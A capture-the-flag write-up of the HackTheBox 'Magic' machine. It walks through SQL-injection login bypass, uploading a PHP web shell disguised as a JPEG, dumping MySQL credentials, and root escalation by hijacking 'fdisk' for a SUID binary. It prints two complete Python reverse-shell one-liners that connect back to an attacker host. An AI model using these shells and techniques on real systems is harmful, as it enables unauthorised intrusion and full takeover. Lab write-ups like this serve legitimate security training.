HackTheBox Magic Writeup – 10.10.10.185
Hey guys, I’m back with another writeup. This time it is the writeup of new Magic (10.10.10.185) Linux machine by TRX released by HackTheBox on 18th April. The machine was classified as Medium difficulty with 30 points.
A very simple and straightforward box with an SQLi exploitation for initial foothold. The machine has a number of vulnerabilities, a file upload vulnerability, bypassing login page authentication using SQLi, uploading WebShell (for me at least, some used different techniques), reading MySQL database etc.
Let us begin.
As always, I add the machine IP to hosts file as magic.htb and I proceed with the NAMP scan.
NMAP Scan Results:
$ nmap -T4 -A -sV -sS magic.htb Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-20 09:07 +03 Nmap scan report for magic.htb (10.10.10.185) Host is up (0.12s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA) | 256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA) |_ 256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Magic Portfolio No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=4/20%OT=22%CT=1%CU=44149%PV=Y%DS=2%DC=T%G=Y%TM=5E9D3C3 OS:A%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=A)OPS OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1 OS:1NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN OS:(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N% OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD OS:=S) Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 443/tcp) HOP RTT ADDRESS 1 117.80 ms 10.10.14.1 2 117.82 ms magic.htb (10.10.10.185) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 32.38 seconds
The NMAP scan shows, SSH on port 22 and Apache Webserver is running on the port 80. I proceed to inspect the port 80.
There is an image portfolio website running on the Apache Webserver. I noticed a login page, tried with admin:admin and a couple of common credentials to see if works, but no.
After a couple of tries, I used the simple SQL injection payloads as credentials, for my surprise it worked and I’m logged-in
As I logged in there is an upload button to upload images. The image formats (JPG, JPEG & PNG) are the only files are allowed to upload.
Reverse Shelling Using PHP WebShell
I recall an old machine where I had a similar scenario, there was a point I had to upload a PHP Web Shell to again access to the system. So I decided to do the same. When I think of PHP Web Shell, I think of WhiteWinterWolf’s PHP web shell.
I download the Webshell and renamed it to nav1n.php.jpeg and add the JPEG hex at the beginning of the image file. I went ahead and upload the file.
After successful upload, I have my PHP Webshell is ready. However, I was preparing for reverse shell command and noticed my shell was gone, then I realized that the uploaded files are being deleted after a minute or so.
As I have my Webshell and reverse shell script is ready, I prepared my listener and execute the simple Python Reverse Shell command using Web shell. And boom, I have reverse shell in my listener as www-data.
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",9998));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
I started to enumerate the www/Magic folder and noticed a PHP file called “db.php5”, I cat it and found credentials for user theseus.
However, this credential didn’t work for switching the users to Theseus or SSH. There must be some other way to privilege escalation, so I kept my enumeration continued.
Upon treading the code, I realized that the credentials are not for Users, instead they are for MySQL Database. I now proceeded to dump the database and read tables and find the credentials possibly stored there.
Dumping MySQL Database
Easy way to dump MySQL database is as easy as below command. I have the DB credentials, so I tried with the below command.
mysqldump -u [username] –p[password] [database_name] > [dump_file.sql]
I made a dumb mistake, and I was kept getting “Access Denied”. I was certain that the credentials I have should be correct. Then after a few tried I realized that the command I was trying to dump database was incorrect. In MySQLDump command there is no space between -u(username) and -p(password)
After fixing my command I got the database dump.
As I assumed I found new credential for the user Admin in the “Login” table.
Privilege Escalation As Theseus
When I tried to switch users as Admin I still got access denied. But the password was for Theseus not “Admin”. I got logged-in as Theseus. I grab the user.txt from user Theseus immediately.
Privilege Escalation To Root
A quick SUID search revealed the user Theseus has permission to following files as well.
I run the SysInfo and the result showed the VM hardware information.
I somehow know that SysInfo can help to get root, but honestly I’m very poor in that. I DM one of the early rooters in the forum asking for a help. He informed me that a custom-made fdisk with revershell inside temp directory will get you root when you run the Sysinfo.
I understood the process, but still unsure how to run “Custom Made FDISK ” inside the temp directory. I started to Google for more help and finally made my mind to gather everything and start.
What I did was I made a file called “fdisk” and edit it using text editor and add the following reverse shell code.
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
I set up my listener to listen the port 9999
I upload the file to a new directory that I created inside the tmp directory.
I modified the permission to execute.
And finally run the SysInfo. And, there I have Reverse shell as root in my listener.
That’s all folks, this is how I root the Magic box. Thank you for dropping by and reading.